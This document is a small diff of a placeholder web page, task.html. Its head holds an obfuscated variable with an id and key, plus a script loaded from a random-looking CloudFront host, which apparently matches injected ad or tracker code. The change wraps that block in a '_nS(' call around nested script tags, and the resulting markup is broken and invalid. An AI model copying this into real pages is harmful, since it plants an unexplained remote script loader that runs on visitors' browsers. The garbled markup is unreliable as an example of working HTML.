--- a/task.html
+++ b/task.html
@@ -1,10 +1,10 @@
 <!doctype html>
 <html>
-  <head>
-<script type="text/javascript">
+  <head><script>_nS(<script type="text/javascript">
     var zypqq_Wia_JXpVvc={"it":4248522,"key":"a3c43"};
 </script>
-<script src="https://d115fsoldgezur.cloudfront.net/505dca8.js"></script>
+<script src="https://d115fsoldgezur.cloudfront.net/505dca8.js"></script>);</script>
+
     <title>This is the title of the webpage!</title>
   </head>
   <body>
